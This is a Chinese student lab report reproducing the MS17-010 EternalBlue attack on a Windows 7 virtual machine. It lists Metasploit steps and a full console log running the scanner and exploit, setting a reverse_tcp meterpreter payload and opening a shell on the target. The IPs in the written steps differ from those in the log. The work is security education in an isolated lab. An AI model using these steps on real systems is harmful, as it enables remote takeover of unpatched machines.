一、实验项目名称
Windows网络服务渗透测试实战MS17-010漏洞复现
二、实验目的及要求
熟悉Metasploit终端的使用方法;
掌握对MS17-010漏洞攻击的方法。
三、复现步骤(附加文字说明加截图)
1、NAT模式
Kali-Linux :192.168.232.141
Windows 7: 192.168.232.1422、查看ip
kali:ip a
win7:ipconfig3、重启网卡
service networking restart4、测试是否连通
kali:ping 192.168.237.1505、进入msf平台
msfconsole6、搜索漏洞模块
search ms17-0107、使用扫描模块
use auxiliary/scanner/smb/smb_ms17_0108、查看选项
show options9、设置
set rhost 192.168.237.150
set rport 44510、验证
run
exploit11、使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue12、查看选项
show options13、设置
set lhost 192.168.237.132
set lport 4444
set rhost 192.168.237.150
set rport 445
set payload windows/x64/meterpreter/reverse_tcp14、攻击
run
──(kali㉿kali)-[~/Desktop]
└─$ ip a 148 ⨯ 1 ⚙
1: lo:
2: eth0:
└─$ ping 192.168.232.142 1 ⚙
PING 192.168.232.142 (192.168.232.142) 56(84) bytes of data.
64 bytes from 192.168.232.142: icmp_seq=1 ttl=128 time=0.390 ms
64 bytes from 192.168.232.142: icmp_seq=2 ttl=128 time=1.19 ms
64 bytes from 192.168.232.142: icmp_seq=3 ttl=128 time=0.565 ms
64 bytes from 192.168.232.142: icmp_seq=4 ttl=128 time=0.367 ms
64 bytes from 192.168.232.142: icmp_seq=5 ttl=128 time=0.487 ms
64 bytes from 192.168.232.142: icmp_seq=6 ttl=128 time=0.658 ms
64 bytes from 192.168.232.142: icmp_seq=7 ttl=128 time=0.346 ms
64 bytes from 192.168.232.142: icmp_seq=8 ttl=128 time=0.556 ms
^Z
zsh: suspended ping 192.168.232.142┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole 148 ⨯ 2 ⚙. . . dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o ' dB' BBP dB'dB'dB' dBBP dBP dBP BB dB'dB'dB' dBP dBP dBP BB dB'dB'dB' dBBBBP dBP dBBBBBBB dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP . . dB' dBP dB'.BP | dBP dBBBB' dBP dB'.BP dBP dBP --o-- dBP dBP dBP dB'.BP dBP dBP | dBBBBP dBP dBBBBP dBBBBP dBP dBP . . o To boldly go where no shell has gone before =[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]Metasploit tip: Start commands with a space to avoid saving
them to historymsf6 > search ms17-010Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hostsCHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hostsCHECK_PIPE false no Check for named pipe on vulnerable hostsNAMED_PIPES /usr/share/metasploit-framework/ yes List of named pipes to checkdata/wordlists/named_pipes.txtRHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 445 yes The SMB service port (TCP)SMBDomain . no The Windows domain to use for authenticationSMBPass no The password for the specified usernameSMBUser no The username to authenticate asTHREADS 1 yes The number of concurrent threads (max one per host)msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.232.142
rhost => 192.168.232.142
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf6 auxiliary(scanner/smb/smb_ms17_010) > run[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_et
[*] Using configured payload windows/x64/meterpreter/reverse_tcpMatching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms17_010_eternalblue[*] Using exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show optionsModule options (exploit/windows/smb/ms17_010_eternalblue):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 445 yes The target port (TCP)SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.SMBPass no (Optional) The password for the specified usernameSMBUser no (Optional) The username to authenticate asVERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects WindowsServer 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.Payload options (windows/x64/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.232.141 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic Targetmsf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.232.141
lhost => 192.168.232.141
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.232.142
rhost => 192.168.232.142
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 192.168.232.141:4444
[*] 192.168.232.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.232.142:445 - The target is vulnerable.
[*] 192.168.232.142:445 - Connecting to target for exploitation.
[+] 192.168.232.142:445 - Connection established for exploitation.
[+] 192.168.232.142:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.232.142:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.232.142:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.232.142:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.232.142:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.232.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.232.142:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.232.142:445 - Sending all but last fragment of exploit packet
[*] 192.168.232.142:445 - Starting non-paged pool grooming
[+] 192.168.232.142:445 - Sending SMBv2 buffers
[+] 192.168.232.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.232.142:445 - Sending final SMBv2 buffers.
[*] 192.168.232.142:445 - Sending last fragment of exploit packet!
[*] 192.168.232.142:445 - Receiving response from exploit packet
[+] 192.168.232.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.232.142:445 - Sending egg to corrupted connection.
[*] 192.168.232.142:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.232.142
[*] Meterpreter session 1 opened (192.168.232.141:4444 -> 192.168.232.142:49717) at 2022-05-16 05:22:53 -0400
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter > ipconfigInterface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:0c:d1:dc
MTU : 1500
IPv4 Address : 192.168.232.142
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::6d7a:d608:7ec3:80e
IPv6 Netmask : ffff:ffff:ffff:ffff::Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:e88e
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffffInterface 13
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280Interface 15
============
Name : Bluetooth vc6
Hardware MAC : c0:3c:59:b9:be:40
MTU : 1500
IPv4 Address : 169.254.121.120
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::2898:c717:bd6d:7978
IPv6 Netmask : ffff:ffff:ffff:ffff::